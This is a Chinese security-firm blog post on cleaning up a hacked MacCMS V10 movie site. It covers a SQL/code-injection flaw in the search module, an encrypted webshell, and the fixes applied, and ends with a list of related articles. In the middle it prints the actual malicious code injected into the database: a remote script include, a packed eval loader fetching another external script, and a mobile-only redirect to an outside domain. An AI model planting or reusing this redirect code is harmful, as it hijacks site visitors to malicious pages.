苹果cms最新漏洞总是被挂马跳转劫持 如何解决
2020年刚开始,苹果CMS被爆出数据库代码执行漏洞,大量的电影网站被挂马,尤其电影的页面被篡改植入了恶意代码,数据库中的VOD表里的d_name被全部修改,导致网站打开后直接跳转到S站或者弹窗广告,目前该maccms漏洞受影响的苹果系统版本是V8,V10,很多客户网站被反复篡改,很无奈,通过朋友介绍找到我们SINE安全寻求技术上支持,防止网站被挂马。根据客户的反应,服务器采用的是linux centos系统,苹果CMS版本是最新的V10版本,我们立即成立网站安全应急响应处理,帮助客户解决网站被攻击的问题。
首先很多站长以为升级了苹果CMS官方最新的漏洞补丁就没问题了,通过我们SINE安全技术对补丁的代码安全分析发现,该漏洞补丁对当前的数据库代码执行漏洞是没有任何效果的,于事无补,网站还会继续被攻击。
我们来看下客户网站目前发生的挂马问题,打开网站首页以及各个电影地址都会被插入挂马代码,如下图所示:
打包压缩了一份网站源代码,以及nginx网站日志文件,我们SINE安全工程师在根目录下发现被上传了网站webshell木马文件,通过网站日志溯源追踪我们查看到访问这个PHP脚本木马文件的是一个韩国的IP,具体的代码如下图:
代码做了加密处理,我们SINE安全对其解密发现该代码的功能可以对网站进行上传,下载,修改代码,操作数据库等功能,属于PHP大马的范畴,也叫webshell木马文件,我们又对苹果CMS的源代码进行了人工安全审计,发现index.php代码对搜索模块上做的一些恶意代码过滤检查存在漏洞,可导致攻击者绕过安全过滤,直接将SQL插入代码执行到数据库当中去。
我们对数据库进行安全检测发现,在VOD表的d_name被批量植入了挂马代码:
script src=https://www.kilin.xyz/1.js
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(newPRegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('4.5(\'<61="3/2" 7="//0.b.c.d/8.0"><\\/9\'+\'a>\');',14,14,'js|type|javascript|text|document|write|script|src|20487493|scr|ipt|users|51|la'.split('|'),0,{}));var LOUMtBZeW=navigator["userAgent"]["toLowerCase"]()["match"](/(ipod|iphone|ipad|android|coolpad|mmp|smartphone|midp|wap|xoom|symbian|j2me|blackberry|wince)/i)!=null;if(LOUMtBZeW){setTimeout('window.location.href="https://m.qiche-hangjia.com:168/ua80666/"',500)}
这手法很专业,不是一般的攻击者所为,针对手机端做了跳转以及隐藏嵌入,让网站运营者根本无法察觉发现,还判断了cookies来路,达到条件才能触发攻击者植入的广告代码。继续安全分析与追踪,发现了攻击者的手法,POST提交到/index.php?m=vod-search,POST内容是加密的这里就不方便发出了,属于漏洞攻击了,可能会给其他使用苹果CMS系统的网站造成攻击,我们SINE安全技术对POST攻击代码进行了解密分析,发现确实是绕过了苹果官方V8,V10系统的代码安全过滤,直接将挂马代码插入到了数据库里了。
问题根源找到了,接下来我们对客户的苹果CMS漏洞进行修复,对POST提交过来的参数进行严格的过滤与转义,对vod-search含有的恶意字符进行强制转换,对恶意代码进行安全拦截,防止传入到后端进行数据库里的代码执行。对网站代码里存在的木马后门进行了全面的人工审计与检查,共计发现5个后门,其余的在缓存目录当中,跟程序代码混淆在一起,也都删除了,对网站的后台地址进行了更改,之前后台使用的地址被攻击者掌握,对管理员的账号密码进行了加强,至此苹果CMS网站被挂马的问题才得以彻底解决,如果您的maccms也被一直挂马,自己懂代码的话可以对POST到index.php的数据进行安全拦截与检查,防止恶意代码的插入,如果不是太懂的话,建议找专业的网站安全公司来处理解决。
苹果cms最新漏洞总是被挂马跳转劫持 如何解决相关推荐
- 如何修复网站漏洞Discuz被挂马 快照被劫持跳转该如何处理
Discuz 3.4是目前discuz论坛的最新版本,也是继X3.2.X3.3来,最稳定的社区论坛系统.目前官方已经停止对老版本的补丁更新与升级,直接在X3.4上更新了,最近我们SINE安全在对其安全 ...
- 织梦首页被快照挟持、被串改、被挂马、被入侵后解决办法
织梦安全防护教程首页被挟持.被串改.被挂马.被入侵后解决办法: 第一步:备份 1-1.后台-系统-数据库备份/还原,数据备份. 1-2.打包整站下载到你电脑上来,防止被改坏了无法还原回来.打包可以利用 ...
- 网站被黑了被挂马篡改后,如何解决网站被挂马?
文章目录 网站被黑了.被挂马.被篡改后,自己如何解决网站被挂马? 示例: 方法一 一. 发现被黑,网站被黑的症状 二.自己猜想了一下原因,页面和百度抓取收录显示不一致.查服务器日志方案不可行. 三.找 ...
- 苹果maccms最新漏洞补丁 防止数据库被反复挂马
[推荐]2019 Java 开发者跳槽指南.pdf(吐血整理) >>> 2020年刚开始,苹果CMS被爆出数据库代码执行漏洞,大量的电影网站被挂马,尤其电影的页面被篡改植入了恶意代码 ...
- php百度快照劫持,最新wordpress程序被挂马,百度快照被劫持的解决方法 | linux系统运维...
摘要 今天在百度查看我wordpress博客网站,发现不能劲,原因是百度搜索显示的是我的网站标题和网站描述内容,但点击进去的时候,却跳转到了别人的网站上,我知道网站被劫持了,我找了下原因,原因是这wo ...
- 金山安全报告:二月漏洞频出 网站挂马猖獗
赚足眼球的"猫癣" 一款早在春节之前就已经发出预警的病毒,在大假结束后还是席卷了国内网络,无论称呼"猫癣"还是"犇牛",被电脑用户们牢牢记住 ...
- 打开网站被挂马跳转到博彩页面 解决办法
从百度这里点击进去,我的网站会直接跳转到赌博网站上去,我一开始以为 是百度有问题了,我再从其他搜索引擎试了一下,360搜索,搜狗搜索点击进去, 都会自动跳转到赌博网站上去,难不成是我网站出问题了? ...
- 苹果cms用拼音伪静态之后,播放页密码访问失效解决方法
近期,用苹果cms搭建了一个影视站玩玩,设置伪静态之后,发现密码访问功能失效 如果使用默认的数字ID则可以访问密码,否则返回404页面. 经过查看代码,发现解决这个问题. 我们打开applicatio ...
- 织梦CMS5.7最新织梦有效防挂马清马,织梦漏洞修补全!2019-8-30更新
本文是为了防止更多织梦站长被灰色产业侵害! 最近在DEDECMS群里听到很多老铁讨论被挂马的事情,轻则是被黑进后台种马,重则整个服务器被提权,织梦安全这么差的原因主要是开发团队解散,已经一年多没有更新 ...
最新文章
- 网络常用命令收藏与整理
- 高质量c/c++编程(10)
- 总在说 Spring Boot 内置了 Tomcat 启动,那它的原理你说的清楚吗?
- maven中snapshot快照库与maven-metadata.xml
- Tomcat8 连接池
- 在Nginx上配置NameCheap免费SSL
- 远程下层文档 正在打印_长宁打印机随叫随到,送货上门
- word wrap java控制台_word wrap 解惑
- 前端实现word、pdf文件在线预览功能
- 初中计算机位图和矢量图教案,浅析图形图像软件教学中位图与矢量图的区别
- 卸载WPS后Office文档图标显示异常
- 卡尔曼滤波原理图文详解
- 哲学思考之矛盾分析法
- 【力扣·每日一题】507. 完美数 (C++ 模拟 数的因子)
- 《DSP using MATLAB》Problem 7.16
- arcgis栅格邻域统计_ArcGIS 邻域丰度计算
- 什么是AI预训练模型?
- 平台会员卡券源码文档
- C/C++基础 sleep()、usleep()、nanosleep()的用法
- 基于海康威视IP摄像头和虹软的MFC人脸识别系统开发教程——02使用示例代码构建MFC工程(海康威视IP摄像头部分)